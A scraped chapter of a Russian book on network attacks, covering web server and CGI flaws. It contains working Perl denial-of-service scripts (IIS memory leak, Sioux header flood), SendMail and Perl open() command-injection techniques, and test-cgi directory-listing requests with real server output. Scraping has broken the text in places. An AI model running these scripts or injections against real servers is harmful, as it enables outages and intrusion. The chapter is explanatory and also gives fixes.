«Техника сетевых атак»

Вид материала

Краткое содержание

Содержание ”; print “IIS 4.0 Memory Leack Врезка «информация» Sioux Attack Врезка «информация» Рисунок apache.bmp Так выглядит логотип сервера Apache Врезка «замечание» Врезка «замечание» Gateway_interface = cgi/1.1 Remote_addr = 195.161.41.233 Http/1.0 200 ok Server_software = Server_port = 80 Remote_addr = 195.161.41.242 Врезка «информация» Врезка «Информация»

Подобный материал:

• Комплексный подход к обнаружению сетевых атак, 70.8kb.
• Предотвращение атак: революция или эволюция?, 98.18kb.
• Темы курсовых работ по дисциплине «Безопасность и управление доступом в ис» Модель, 15.44kb.
• Технические особенности сетевых сообществ и их педагогические следствия, 124.33kb.
• А. А. Грабко научный руководитель В. С. Горбатов, к т. н., доцент Московский инженерно-физический, 29.26kb.
• Это комплекс взаимосвязанных и согласованно функционирующих программных и аппаратных, 277.11kb.
• Лекция: Определение локальных сетей и их топология Вэтой лекции говорится о базовой, 250.42kb.
• Лекция: Определение локальных сетей и их топология Вэтой лекции говорится о базовой, 318.77kb.
• Тутер Нина Валерьевна Клинико-психофизиологический анализ панических атак при различных, 560.1kb.
• Использование современных компьютерно-сетевых технологий в информационном обеспечении, 158.29kb.

”;

print “IIS 4.0 Memory Leack

---

\n";

$count=1;

$size=10240;

$N=100;

while ($count<$N)

{

socket(SRV, PF_INET(), SOCK_STREAM(), getprotobyname("tcp") || 6);

connect(SRV, sockaddr_in(80,inet_aton('www.iis40.com')));


send(SRV, "POST /cgi-bin/test-cgi HTTP/1.0\n",0);

send(SRV,"Content-Length:$size\n\n",0);

$count++;

print "Content-Length:$size\n";

print "
";

}


Приведенный пример²⁸³ посылает 100 запросов с требованием выделить 10 килобайт памяти для каждого из них. В результате этого, 100x10 == 1000 килобайт оказываются потерянными²⁸⁴

Врезка «информация»

Скорее комичная, чем опасная ошибка была обнаружена в… принтере «HP LaserJet 4500 + HP JetDirect J3111A», имеющим встроенный Web-сервер, предназначенный для удаленного администрирования. Неумеренно длинный запрос GET приводил к выдаче на печать страницы диагностики. Атакующий мог в короткое время привести в негодность всю бумагу, находящуюся в лотке и блокировать остальные задания на печать.


Ошибки такого типа относятся к досадным промахам разработчиков и обычно никакого интереса не представляют. В самом деле, шансы встретить на произвольно взятом узле требуемую для атаки конфигурацию, очень малы и все продолжают уменьшаться с каждым днем с момента опубликования информации об ошибке.

Гораздо большую опасность представляют концептуальные уязвимости, одинаково хорошо работающие на любых платформах, операционных системах и серверах. Одним из недостатков протокола HTTP является неограниченный размер заголовка запроса. А ведь для его хранения и обработки требуется некоторое количество памяти и процессорного времени!

Забросав сервер, огромными, бессмысленными (или осмысленными – это роли не играет) заголовками, можно значительно ухудшить его производительность, вплоть до полного отказа в обслуживании остальных клиентов.

Именно эта бесхитростная технология и была положена в основу Sioux²⁸⁵ - атак, один из примеров программной реализации которой показан ниже²⁸⁶.

• #!/usr/local/bin/perl -w
  
• use Socket;
  
• print "Content-type: text/html\n\n";
  
• print "

  Sioux Attack

  ---

  
  \n";
  
• $size=16384;
  
• $N=20000;
  

• 
  

• socket(SRV, PF_INET(), SOCK_STREAM(), getprotobyname("tcp"));
  
• connect(SRV, sockaddr_in(80,inet_aton('www.sacrificial.com')));
  

• 
  

• send(SRV, "GET / HTTP/1.0\n",0);
  
• $devastating=('x'x$size);
  
• $count=1;
  
• while ($count<$N)
  
• {
  
• send(SRV,"Field$count:$devastating\n",0);
  
• $count++;
  
• print "Field$N:$devastating\n";
  
• print "
  ";
  
• }
  

Приведенный пример, посылает на сервер-жертву запрос, в заголовке которого присутствуют $N полей длиной в $size байт каждое. Конкретные значения $N и $size зависят от пропускной возможности канала атакующего, типа сервера и множества других условий. Экспериментально было установлено, что наибольшую нагрузку вызывают пакеты с длиной полей заголовков от восьми до шестнадцати килобайт.

Врезка «информация»

Девятого Февраля Торговый Департамент США убеждал On-line компании и агентства в своей непричастности к хаосу, пошатнувшего мирное течение жизни Всемирной Паутины (предполагалось, что именно их компьютеры были использованы для атаки).

«Там и правда неважно обстояло с защитой» заметил Вильям Делай на пресс-конференции в Чикаго, кивая в сторону «Yahoo», первую жертву хакерской атаки, случившийся днем раньше. Следом были атакованы ссылка скрыта, ссылка скрыта, ссылка скрыта и несколько других сайтов, не упомянутых здесь по причине их малой известности российским интернетчикам.

ФБР невнятно отозвалось насчет перспективы поимки и наказания злоумышленника (который все же позже был пойман не без участия российского ФСБ). Зато активно пропагандировало превентивные меры защиты, то есть «латание дыр» в системах безопасности серверных приложений, в чем ФБР обещало активную помощь, рекламируя свежие «заплатки» выложенные на ссылка скрыта.

Заглянув туда трудно было удержаться от разочарования. Похоже, что ФБР не заботило ничего, кроме собственной безопасности, на что указывал падч, предназначенный для операционных систем Solaris 2.5.1, 2.6, Solaris 7 (Sparc, Intel), то есть тех, на которых ФБР, собственно, и работает.

Так же поддерживалась неизвестная версия LINIX для платформы Intel. А Windows?

Но ФБР не волнует судьба пользователей (и администраторов), сидящих под Windows, поэтому «…This file will not work on a Windows-based PC», или, говоря человеческим языком, «сушите весла».

Билл Клинтон предпочел более действенные меры, пообещав 2 биллиона долларов (ссылка скрыта), на войну с тем гнусным типом хакеров, чьи атаки подрывают сетевую экономику (которая составляет не много не мало, а что-то порядка 25%, по крайней мере, в США).

Правда деньги будут выделены едва ли к концу этого года, а то и к середине следующего (то есть 2001). Зато уже находятся желающие оторвать себе кусок от этого пирога. Часть денег уйдет в Лабораторию Информационных Технологий (ссылка скрыта) и, конечно же, Национальный Институт Стандартов (ссылка скрыта).

Каким боком упомянутые организации относятся к безопасности – это уже, как говорится, «вопрос пятый». Вопрос о том, кто больше виноват хакеры, дырявые системы, или все же не в последнюю очередь неправильная политика безопасности атакуемый фирм, так и не встал.

Создается впечатление, что в действительности все заинтересованы не в решении проблемы, а возможности «выдоить» из бюджета правительства немного денег под те проекты, которые правительство по идее финансировать ну никак не обязано. В конечном счете, ваша личная безопасность, - это все же ваша забота, а у Мр. Президента есть и другие дела.

За подробностями сих разборок можно сходить на сайт агентства CNN (ссылка скрыта)


Первыми на эту атаку отреагировали разработчики Apache, добавив новую директиву «LimitRequestFields» , ограничивающую максимальное количество полей в заголовке запроса. К сожалению, остальные производители проявили гораздо меньшую оперативность и до сих пор некоторые серверы могут быть блокированы таким способом²⁸⁷.

Рисунок apache.bmp Так выглядит логотип сервера Apache

Но, если дыры в серверах элементарно затыкаются выпущенной производителем заплаткой, то ошибки в скриптах, созданных владельцем сервера (или командой работающих на него программистов) находить и устранять приходится самому разработчики, что не так-то просто. Очень трудно создать непротиворечивую систему обработки пользовательского ввода, предусматривающую и отсекающую все потенциально опасные шаги злоумышленника. Большинство программистов рассчитывают на лояльного клиента, обращающегося со скриптом «как нужно» и «как того требует здравый смысл».

Классическое подтверждение тому код, отправляющий письмо по адресу, указанному пользователем, который встречается практически в любой регистрационной WEB-форме. В UNIX системах для этой цели, как правило, используется вызов приложения SendMail, с передачей адреса назначения в командной строке. Ввиду своей простоты такая схема заслужила большую популярность и как будто бы работала нормально. Пока, однажды, кому-то не пришла в голову мысль использовать перенаправления ввода для копирования файлов, доступ к которым при нормальном ходе вещей невозможен. Если злоумышленник вместе с почтовым адресом передаст SendMail-у свои команды, он сможет получить любой файл, какой ему заблагорассудится. В основе этого приема лежит механизм обработки адресов программой SendMail: «Любой адрес, проходящий через начальный алгоритм синтаксического разбора локальных адресов (то есть не являющийся действительным адресом для другой почтовой программы) сканируется на два специальных случая. Если он предварен вертикальной чертой ("|"), то оставшаяся часть адреса будет обработана как команда оболочки (shell command). Если имя пользователя начинается со знака косой черты ("/"), то это имя используется как имя файла, вместо имени пользователя. Файлы, имеющие выставленные биты смены владельца (setuid) или смены группы (setgid) но не имеющие битов выполнения имеют эти биты, если sendmail запущен от пользователя root.»²⁸⁸

Так, например, если в качестве обратного адреса в WEB-форму ввести “Hack2000@mail.ru; mail Hack2000@mail.ru 
Какую ошибку допустил разработчик? Он надеялся на послушного пользователя, вводящего именно те данные, на которые рассчитывал программист. Психологическая инерция, то есть подсознательное стремление откинуть все варианты, не вписывающие в жизненный опыт, на этот раз оказала «медвежью услугу».

Врезка «замечание»

Хорошо иллюстрирует инерцию мышления такой случай. Рассказывают²⁸⁹, что некогда известный микробиолог Роберт Кох что-то кипятил в стеклянной колбе, плотно окутанной изрыгаемым ею паром. Вошедший в лабораторию ассистент поинтересовался, что тут за дела творятся. «Угадай» предложил Кох, - «что находится в колбе?». Ассистент, битый час перечислял все известные ему микробы, но тщетно. «Это же сосиски!» воскликнул Кох.

Теоретически варить сосиски в колбе позволительно, но практически ее используют совсем в иных целях, и у ассистента сложилась прочная ассоциация «колба»-«бактерии», мешающая сделать очевидное логическое умозаключение²⁹⁰.


В тридцатых годах нашего столетия швейцарский астроном Ф. Цвикки создал, так называемый, морфологический метод, названный им, методом направленной интуиции, заключающийся в систематическом переборе всех возможностей, включая и те, которые противоречат нашему жизненному опыту, и никогда не встречались ранее.²⁹¹

Два, приведенных выше примера (с сосисками и SendMail) подтверждают тот факт, что никакие, даже нелепые комбинации, не могут быть откинуты. Разработчик должен исходить не из убеждений, как нужно использовать скрипит, а из того, как можно его использовать. Существует люди, отличаются от всех остальных ослабленной инерцией мышления. Это особый склад сознания, не принимающий ничего на веру и не подверженный догматизму. За кажущимся число количественным различием скрывается принципиальная разница. Если одна категория людей стремиться найти объяснение, некому наблюдаемому явлению, то другую привлекает обратный процесс. То есть, мышление первой категории можно уподобить схеме жизненный опыт(явление)  объяснение, т.е. каждое явление объясняется на основании уже существующего жизненного опыта. Другая же категория, напротив, на основе наблюдаемого явления формирует свой жизненный опыт.

Врезка «замечание»

Яркой иллюстрацией инерции мышления могут служить запутанные движения планет, трактуемые астрологами как божественные предзнаменования. Однако еще в древности находились философы, замечающие, а не являются ли сложные перемещения на небе отражением совершенных траекторий в пространстве?


Проблема заключается в том, что неверное объяснение часто воспринимается истинным и в дальнейшем становиться настолько привычным, что и в голову не приходит перепроверить или рассмотреть его под другими углом зрения.

Так, например, давным-давно был написан простейший командный файл “test-cgi”, позволяющий с помощью “echo” контролировать переданные серверу переменные окружения. Казалось бы, в приведенной ниже программе (на диске, прилагаемом к книге, она находится в файле “/SRC/test-cgi”) просто не в чем ошибиться:

• #!/bin/sh
  

• 
  

• echo Content-type: text/plain
  
• echo
  

• 
  

• echo SERVER_SOFTWARE = $SERVER_SOFTWARE
  
• echo SERVER_NAME = $SERVER_NAME
  
• echo GATEWAY_INTERFACE = $GATEWAY_INTERFACE
  
• echo SERVER_PROTOCOL = $SERVER_PROTOCOL
  
• echo SERVER_PORT = $SERVER_PORT
  
• echo REQUEST_METHOD = $REQUEST_METHOD
  
• echo HTTP_ACCEPT = $HTTP_ACCEPT
  
• echo PATH_INFO = $PATH_INFO
  
• echo PATH_TRANSLATED = $PATH_TRANSLATED
  
• echo SCRIPT_NAME = $SCRIPT_NAME
  
• echo QUERY_STRING = $QUERY_STRING
  
• echo REMOTE_HOST = $REMOTE_HOST
  
• echo REMOTE_ADDR = $REMOTE_ADDR
  
• echo REMOTE_USER = $REMOTE_USER
  
• echo CONTENT_TYPE = $CONTENT_TYPE
  
• echo CONTENT_LENGTH = $CONTENT_LENGTH
  

В таком (или почти в таком) виде скрипт прилагался ко многим WEB серверам и широко распространился по сети. Администраторы без малейших опасений помещали его в исполняемую директорию и открывали доступ всем желающим. В конечном счете, это привело к внезапному росту успешных взломов. Механизм атаки заключался в «подсовывании» символа-джокера внешне безобидному скрипту “test-cgi”. Команда “echo” интерпретировала его как указание вывести список файлов, отвечающих заданному шаблону.

Например, список всех остальных скриптов в текущем каталоге можно было просмотреть так: “GET /cgi-bin/test-cgi?*”. На первый взгляд, в этом ничего опасного в это нет, но на самом деле, просмотр содержимого каталогов, открывает возможность для целенаправленной атаки. В сочетании с возможностью использования перенаправления ввода в почтовых адресах, передаваемых приложению SendMail, простор содержимого директорий, приводит к угрозе целенаправленной атаки.

Пример, приведенный ниже, демонстрирует просмотр содержимого корневого каталога одного из серверов - ссылка скрыта²⁹². Если в адресной строке браузера набрать “ссылка скрыта”²⁹³, то ответ сервера должен выглядеть приблизительно так²⁹⁴ (жирным шрифтом выделено содержимое поля QUERY_STRING, возвращающее результат обработки запроса):

• GET /cgi-bin/test-cgi?/*
  

• CGI/1.0 test script report:
  

• 
  

• argc is 1. argv is /\*.
  

• 
  

• SERVER_SOFTWARE = Apache/1.3.0 (Unix) Debian/GNU
  

• SERVER_NAME = home.project.aha.ru
  

• GATEWAY_INTERFACE = CGI/1.1
  
• SERVER_PROTOCOL = HTTP/1.1
  
• SERVER_PORT = 80
  
• REQUEST_METHOD = GET
  
• HTTP_ACCEPT = image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, */*
  
• PATH_INFO =
  
• PATH_TRANSLATED =
  
• SCRIPT_NAME = /cgi-bin/nph-test-cgi
  
• QUERY_STRING = /6 /8 /bin /boot /bzImage-2.0.35 /bzImage-2.2.11 /bzImage-2.2.11-2 /bzImage-2.2.12 /cdrom /dev /etc /floppy /home /initrd /lib /lost+found /mnt /oak /proc /root /sbin /tmp /usr /var
  
• REMOTE_HOST = ppp-09.krintel.ru
  
• REMOTE_ADDR = 195.161.41.233
  
• REMOTE_USER =
  
• CONTENT_TYPE =
  
• CONTENT_LENGTH =
  

Проблему решили установкой кавычек вокруг “$QUERY_STRING”²⁹⁵. Какое-то время это сдерживало злоумышленников, но инерция мышления подвела разработчиков и на этот раз. Считалось, что “$QUERY_STRING”, это единственный параметр, который передается серверу пользователем, поэтому на все остальные не обратили никакого внимания. Но оказалось, что большинство серверов (включая самый распространенный из них – Apache) не проверяют синтаксической корректности содержимого поля «версия HTTP», указываемой при передаче запроса. В результате этого появляется возможность подставить вместо нее любую строку, например, “/etc/*”. Демонстрация такой атаки приведена ниже²⁹⁶ (жирным шрифтом выделено поле “SERVER_PROTOCOL”, которое при нормальном развитии событий должно содержать версию HTTP, используемую клиентом, а в данном случае список файлов и папок директории “/etc”):

• GET /cgi-bin/nph-test-cgi?* /usr/*
  

• 
  

• HTTP/1.0 200 OK
  
• Content-type: text/plain
  

• 
  

• Server: Apache/1.3.0 (Unix) Debian/GNU
  

• 
  

• CGI/1.0 test script report:
  

• 
  

• argc is 1. argv is \*.
  
• SERVER_SOFTWARE = Apache/1.3.0 (Unix) Debian/GNU
  
• SERVER_NAME = biophys.urcrm.chel.su
  
• GATEWAY_INTERFACE = CGI/1.1
  
• SERVER_PROTOCOL = /usr/7 /usr/X11R6 /usr/bin /usr/dict /usr/doc /usr/games /usr/include /usr/info /usr/lib /usr/local /usr/lost+found /usr/man /usr/sbin /usr/share /usr/src
  
• SERVER_PORT = 80
  
• REQUEST_METHOD = GET
  
• HTTP_ACCEPT =
  
• PATH_INFO =
  
• PATH_TRANSL
  
• ATED = SCRIPT_NAME = /cgi-bin/nph-test-cgi
  
• QUERY_STRING = 1.pgsql 2.pgsql 2.pgsql~DEADJOE archie calendar capture date dwww-fig finger fortune htsearch imagemap
  
• info2www-fig log logging.cgi~ log~ mailto.pl nph-test-cgi php3 test-cgi test-env
  
• uptime wais.pl www-pgsql wwwcount.cgi
  
• REMOTE_HOST = ppp-18.krintel.ru
  
• REMOTE_ADDR = 195.161.41.242
  
• REMOTE_USER =
  
• CONTENT_TYPE =
  
• CONTENT_LENGTH =
  

После исправления этой ошибки, настал черед “REMOTE_USER”, “CONTENT_TYPE”, “USER_AGENT” и т.д.

Отсюда вытекает ряд неутешительных заключений. Нельзя полагаться ни на какие стандартные библиотеки и творения сторонних разработчиков. Массовость и идентичность – вот основное оружие злоумышленников. Чтобы исследовать скрипт, прежде всего, необходимо получить его исходный код. На правильно сконфигурированном сервере это невозможно, но никакая защита не в состояние предотвратить анализ общедоступных программ. А, получив в свое распоряжение общедоступный скрипт, злоумышленник может попытаться обнаружить содержащиеся в нем ошибки. А, обнаружив, атаковать жертву, использующую такой скрипт.

Возникает противоречивая ситуация. Программировать самому не рекомендуется, ввиду отсутствия у подавляющего большинства необходимого опыта и навыков создания безопасных приложений. Но и фирменные разработки не застрахованы от ошибок. Так, поистине огромное количество ошибок содержится в расширениях к FrontPage (FPE).

Врезка «информация»

При установке FrontPage 1.1, файлы /_vti_pvt.administrator.pwd, /_vti_pvt/authors.pwd и /_vti_pvt/service.pwd по умолчанию становятся общедоступными и не требуют от пользователя авторизации.

Врезка «Информация»

После установки FPE на Apache, открывается доступ к директории /_vti_bin, с правами записи и исполнения файлов даже для неавторизированных пользователей.


Интуитивно кажется, – свои скрипты должны оказаться надежнее: какие бы ошибки не были допущены, недоступность исходного текста программы не позволит злоумышленнику их обнаружить (или, по крайней мере, чрезвычайно затруднит их поиск). Однако практика доказывает обратное. И не удивительно, – ведь программисты склонны к одним и те же типовым ошибкам.

С рассмотрения одной из них и началась эта глава (передача почтальону SendMail адреса, введенного пользователем). Разработчики часто используют вызов внешних программ для выполнения тех действий, реализовывать которые в самом скрипте было бы невозможно или чрезвычайно затруднительно. Опасность такого подхода заключается в том, что практически любое приложение обладает рядом недокументированных особенностей, и порой способно к непредсказуемому поведению. А это может быть использовано для проникновения на компьютер жертвы или его блокирования.

Если же полностью отказаться от использования внешних программ невозможно, рекомендуется выполнять фильтрацию ввода пользователя – до передачи данных внешней программе проанализировать их содержимое, проверяя корректность ввода пользователя. Фильтрацию желательно осуществлять во всех случаях, и контролировать все данные, даже никак не связанные с пользователем. Любые данные должны быть тщательно проверены до того, как они будут использованы. Очень распространенная ошибка – вызов служебной подпрограммы, оформленной в виде отдельного скрипта с передачей аргументов в командной строке. Многие разработчики склонны полагать, что такой скрипт всегда вызывается только их кодом, и забывают о проверке параметров.

Если таким образом попытаться открыть (и прочитать) файл, переданный как параметр, злоумышленник сможет выполнить любой код на сервере, от имени уязвимой программы. Причина заключается в том, что функция “open” языка Perl (на котором написано подавляющее большинство скриптов) интерпретирует символ “|” как конвейер и позволяет выполнить любую команду. Например, “open(H,”File |”)”, приведет к запуску, а не открытию файла “File”.

Вышесказанное демонстрирует фрагмент кода, приведенный ниже (на диске, прилагаемом к книге, он находится в файле “/SRC/open.pl”):

• open(FX,"$file");
  
• while ()
  
• {
  
• print;
  
• }
  

Если значение переменной “$file” передается в командной строке (или через переменные окружения), злоумышленник получает возможность изменять его по своему усмотрению! Для проведения экспериментов можно воспользоваться следующим HTML-кодом, который размещен на сервере rovider.com/open.php

• 
  
• 
  
• 
  
• 
  
• 
  
• 
  
•